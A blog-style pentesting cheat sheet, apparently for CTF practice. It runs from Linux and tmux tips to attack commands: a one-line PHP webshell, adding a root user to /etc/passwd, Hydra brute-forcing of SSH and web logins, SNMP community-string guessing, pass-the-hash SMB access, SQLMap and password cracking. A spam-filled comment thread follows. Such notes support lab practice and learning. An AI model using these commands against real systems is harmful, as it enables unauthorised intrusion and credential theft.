Linux General
ctrl + r
Search History reverse
Run Script at startup
chmod 755 /path/to/the/script
update-rc.d /path/to/the/script defaults
update-rc.d -f /path/to/the/script remove
Delete Script from defaults
Vim
i
for insert mode
esc
to leave insert mode
To be continued with macros and all this handy shit
Tmux
Config from ippsec.
#set prefix
set -g prefix C-a
bind C-a send-prefix
unbind C-b
set -g history-limit 100000
set -g allow-rename off
bind-key j command-prompt -p "Join pan from:" "join-pane -s '%%'"
bind-key s command-prompt -p "Send pane to:" "joian-pane -t '%%'"
set-window-option -g mode-keys vi
run-shell /opt/tmux-logging/logging.tmux
First press the prefix ctrl + a
, then release the buttons and press the combination you want.
tmux new -s [Name]
new named session
prefix + c
create new window
prefix + ,
Rename window
prefix + #
change panes
prefix + w
list windows
prefix + %
vertical split
prefix + "
horizontal split
prefix + s #
join pane
prefix + z
zoom in/out to panes
prefix + !
make splitted part to own window
prefix + ]
enter vim mode
-> search with ?
in vi mode
-> press space
to start copying
-> press prefix + ]
to paste
alt + .
cycle through arguments in history
tmux kill-session -t X
kill session by tag
prefix + &
kill pane
Nmap
nmap -sV -sC -p- -oN [FILE] [IP]
Standard
nmap -p- -sV -sC -A --min-rate 1000 --max-retries 5 -oN [FILE] [IP]
Faster But ports could be overseen because of retransmissoin cap
nmap --script vuln -oN [FILE] [IP]
Local File Inclusion
Get the contents of all PHP files in base64 without executing them.
<?php echo passthru($_GET['cmd']); ?>
PHP Webshell
Upgrade Shell
python -c'import pty; pty.spawn("/bin/bash")'
Background Session with ctrl + z
stty raw -echo
stty -a
get row & col
stty rows X columns Y
Set rows and cols
Foreground Session again
fg #jobnumber
export XTERM=xterm-color
enable clear
Add Account/Password to /etc/passwd
Generate password
openssl passwd -1 -salt [Username] [PASSWD]
Then Add to passwd file
Username:generated password:UID:GUID:root:/root:/bin/bash
SQLMap
Capture Request with Burp.
Save Request to File.
sqlmap -r [REQUEST] --level [X] --risk [Y]
Use SSH Key
Download & save
It is necessary to change the permissions on the key file otherwise you have to enter a password!
chmod 600 [KEY]
ssh -i [KEY] [IP]
Searchsploit
searchsploit [TERM]
searchsploit -m exploits/solaris/local/19232.txt
Copy to local directory
Convert RPM Package to deb
alien [Pakage.rpm]
Bufferoverflows
Locate Overflow
patter_create.rb -l [SIZE]
Start gdb and run
r [PATTERN]
Copy the segfault String
pattern_offset.rb [SEGFAULT STRING]
Receive Match at exact offset X.
Now you know you have at X the EIP override and so much space in the buffer.
Simple exploit developement
Get Information about the binary.
checksec [Binary]
Search packetstrom for Shellcode.
Remember to use correct architecture.
Work in progress above…
SNMP
Bruteforce community string
nmap -sU -p 161 [IP] -Pn --script=snmp-brute
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt [IP]
Community String is in both cases “private”
snmp-check [IP] -c public
snmpwalk -c public [IP] -v 2c
Hydra
hydra -l root -p admin 192.168.1.105 -t 4 ssh
hydra -L root -P File 192.168.1.105 -t 4 ssh
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.X
http-post-form "/login:username=^USER^&password=^PASS^:F=failed"
John the ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Crack zip Files
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' "file.zip"
Note: Be careful with the quotes!
Crack openssl encrypted files
#!bin/bash
for password in $(cat /usr/share/wordlists/rockyou.txt)
do
openssl enc -d -aes-256-cbc -a -in file.txt.enc -k $password -out $password-drupal.txt
done
After this you get one file for every Password tried.
ls -lS
Sort them by size and find the one unique size. Or try to grep the content.
Pass the hash smb
With nt hash the --pw-nt-hash
flag is needed, default is ntlm!
pth-smbclient \\\\10.10.10.107\\$ -W <DOMAIN> -U <USER> -L <IP> --pw-nt-hash <HASH>
List all shares on .
pth-smbclient \\\\10.10.10.107\\<SHAR> -W <DOMAIN> -U <USER> --pw-nt-hash <HASH>
Connect to .
FTP
wget -r ftp://user:[email protected]/
Recursively download with ftp.
SMB Null Session
smbclient //10.10.10.X/IPC$ -W Workgroup -I 10.10.10.X -U ""
WFUZZ
wfuzz -z range,1-65600 --hc 500 "http://IP:PORT/dir?parameter=id&port=FUZZ"
Fuzz a range of ids/port numbers.
Wordlist with crunch
crunch 15 15
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*?=walkthrough%&0123456789"
-t 123456789012345@ > wordlist.txt
hashcat
sha256
hashcat --force -m 1400 --username hash.txt /usr/share/wordlists/rockyou.txt
Great content! Super high-quality! Keep it up! 🙂
Hi, i think that i saw you visited my blog so i came to “return the favor”.I’m attempting to
find things to enhance my site!I suppose its ok to use some of your ideas!!
Yeah sure !
You can certainly see your expertise within the article you write.
The world hopes for more passionate writers like you who are not afraid to say how they believe.
At all times follow your heart.
Thanks for the kind words
What’s Happening i am new to this, I stumbled upon this I have discovered
It positively helpful and it has aided me out loads.
I’m hoping to contribute & assist other customers like its helped me.
Good job.
Thanks for the support .
Good day! I know this is kinda off topic but I was wondering if you knew where I could find a captcha plugin for
my comment form? I’m using the same blog platform as yours and I’m having trouble finding one?
Thanks a lot!
Quality content is the key to be a focus for the people to pay a visit the website, that’s what
this website is providing.
Thanks for your kind words it really motivated me
This is really interesting, You’re a very skilled blogger.
I have joined your rss feed and look forward to seeking more of your
fantastic post. Also, I have shared your website in my social networks!
Thanks buddy this motivated me more
Thanks buddy
The Raven Cycle Order Up Board Result 2012 High School Verification
Here is my blog post; library; http://vgcxfoh.shoppy.pl/Produkt/ebook-robert-skyler-repesz-fold-003-hideg-koncepcioub0u,
Molecular Cell Biology And Bioinnovation Pre
Primary Wa Curriculum
My web page … book epub
Traditional Poetry In Literature Harry Potter Movies In Order List
my web-site – best books
Hiya, I am really glad I’ve found this info. Today bloggers publish just about gossip and internet stuff and this is actually frustrating. A good web site with interesting content, that’s what I need. Thank you for making this site, and I’ll be visiting again. Do you do newsletters by email?
Thanks for the support
Yesterday, while I was at work, my sister stole my iPad and tested to see if it can survive a thirty foot drop, just so she can be a youtube sensation. My apple ipad is now broken and she has 83 views. I know this is totally off topic but I had to share it with someone!
This really addressed my problem, thanks!
Then my motive is complete
I discovered your weblog web site on google and examine a number of of your early posts. Continue to keep up the superb operate. I just further up your RSS feed to my MSN News Reader. Searching for forward to reading extra from you in a while!…
thanks
great website
There’s certainly a lot to know about this issue. I like all of the points you made.